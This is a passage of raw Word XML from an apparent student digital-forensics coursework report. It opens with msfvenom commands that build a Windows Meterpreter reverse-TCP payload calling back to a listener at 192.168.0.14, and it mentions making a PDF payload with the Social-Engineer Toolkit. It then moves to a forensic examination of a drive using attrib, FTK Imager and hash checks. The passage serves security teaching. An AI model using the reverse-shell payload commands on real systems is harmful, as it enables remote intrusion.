    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload without encryption with .txt extension, called iamtext.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="ffffff"/>
          <w:shd w:fill="333333" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">`msfvenom -p windows/meterpreter/reverse_tcp LHOST=</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="d36363"/>
          <w:shd w:fill="333333" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.0.14</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="ffffff"/>
          <w:shd w:fill="333333" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> LPORT=</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="d36363"/>
          <w:shd w:fill="333333" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4455</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="ffffff"/>
          <w:shd w:fill="333333" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -f raw -o /home/kali/Desktop/iamtext.txt`</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using existing payload in relation to windows/meterpreter/reverse_tcp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="ffffff"/>
          <w:shd w:fill="333333" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">`msfvenom --list payloads | grep windows/meterpreter/reverse_tcp`</w:t>
      </w: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E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_738smjzghtww" w:id="64"/>
      <w:bookmarkEnd w:id="64"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Generating a payload using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Social-Engineer Toolkit (SET)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in .pdf format.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DF">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E0">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_er54hnx70kda" w:id="65"/>
      <w:bookmarkEnd w:id="65"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Task 3: Digital Forensic Investigation Simulation</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Part 2: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Analysing</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Data</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_8pwh7amnlj4b" w:id="66"/>
      <w:bookmarkEnd w:id="66"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Initial Examination and Assessment </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Name of the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Team Report</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Group C - Task 3 - ACCA7031 - Digital Forensics Analysis.docx</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E3">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The initial assessment of a 500GB Maxone hard drive, initially appearing empty and formatted with the ExFAT file system, revealed no additional partitions upon executing </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="a2fca2"/>
          <w:shd w:fill="333333" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'diskpart'</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="a2fca2"/>
          <w:shd w:fill="333333" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'list volume'</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="ffffff"/>
          <w:shd w:fill="333333" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">commands. However, using the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="a2fca2"/>
          <w:shd w:fill="333333" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'attrib -h -r -s /s /d E:*.*'</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command on a Windows 11 machine uncovered hidden files and folders within the E:\ drive.</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Upon initial examination, I found the following files present on the hard drive:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">VolumeConfiguration.plist</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SOCIAL MEDIA INVESTIGATION Folder</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E6">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Chats</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E7">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">30 screenshots of social media chats in .JPG and .PNG formats.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E8">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Call Logs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E9">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2 screenshots of call logs in .PNG format.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EA">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EB">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Readme.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EC">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000ED">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Document.rar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EE">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Later revealed e_PoliceReport-CS-01 and e_PoliceReport-CS-02</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EF">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F0">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Files with .File extension</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F1">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">e_IMG_0010</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F2">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">e_IMG_0013</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F3">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F4">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">encrypt_file002.cpp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F5">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F6">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IMG_0010.jpeg, IMG20231123140.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F7">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_t9r1yidnaqs2" w:id="67"/>
      <w:bookmarkEnd w:id="67"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Storage and Backup</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F9">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To ensure the integrity of the data we collected from Team B, I used the well-known </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FTK Imager tool</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to create an image of the evidence. After the imaging process was completed, I verified the integrity of the image by comparing hash values, which confirmed that it was an exact duplicate of the original disk.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_3a8vri2zou2q" w:id="68"/>
      <w:bookmarkEnd w:id="68"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Directory Insight Analysis</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_h7j4fmt2eln7" w:id="69"/>
      <w:bookmarkEnd w:id="69"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">VolumeConfiguration.plist and .fseventsd and fseventsd-uuid</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FC">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I reviewed the aforementioned files and created a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Google Sheet</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to organize data pertaining to the drive. The </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">VolumeConfiguration.plist</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file offers detailed insights about a specific volume, which in this case is formatted as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ExFAT </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and connected via USB. This particular volume is classified as an external, local volume and is linked to a unique UUID </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="ffffff"/>
          <w:shd w:fill="333333" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(ABD1A7E0</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="d36363"/>
          <w:shd w:fill="333333" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-6844-392</w:t>
      </w:r>
